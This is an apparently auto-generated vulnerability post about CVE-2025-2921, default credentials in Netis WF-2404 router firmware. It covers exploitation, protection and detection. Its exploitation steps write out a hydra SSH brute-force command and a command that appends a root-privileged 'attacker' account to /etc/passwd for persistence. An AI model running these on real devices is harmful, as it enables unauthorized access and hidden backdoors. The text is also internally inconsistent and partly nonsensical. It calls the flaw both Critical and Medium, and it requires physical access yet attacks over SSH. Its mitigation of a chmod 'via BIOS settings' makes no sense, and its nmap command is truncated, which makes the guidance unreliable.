Listen to this Post
How CVE-2025-2921 Works
This critical vulnerability in Netis WF-2404 firmware version 1.1.124EN stems from improper handling of the `/etc/passwd` file, allowing attackers to exploit default credentials (e.g., “Realtek”) for unauthorized access. The flaw requires physical device access (AV:P) and high attack complexity (AC:H), but successful exploitation grants full control (VC:H/VI:H/VA:H). The vendor failed to patch despite early disclosure, leaving devices exposed to privilege escalation.
DailyCVE Form
Platform: Netis WF-2404
Version: 1.1.124EN
Vulnerability: Default password
Severity: Critical
Date: 04/17/2025
What Undercode Say:
Exploitation
- Physical Access: Attacker connects to device via console/USB.
2. Brute Force: Use default credentials (e.g., `Realtek:admin`):
hydra -l Realtek -P wordlist.txt ssh://192.168.1.1
3. Post-Exploit: Modify `/etc/passwd` for root persistence:
echo 'attacker:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
Protection
- Firmware Update: Check vendor for patches (none available as of 04/2025).
2. Credential Hardening: Change default passwords:
passwd Realtek
3. Network Isolation: Restrict physical access to device ports.
Detection
Scan for vulnerable firmware versions:
nmap -sV --script=http- 192.168.1.0/24
Mitigation
Block unauthorized USB/console access via BIOS settings:
sudo chmod 600 /dev/ttyUSB
Analytics
- CVSS 4.0: 5.4 (Medium) due to physical access requirement.
- Exploitability: Low (no known PoC public).
- Attack Surface: Limited to local attackers.
References
- VulDB Entry
- CWE-798: Use of Hard-coded Credentials.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
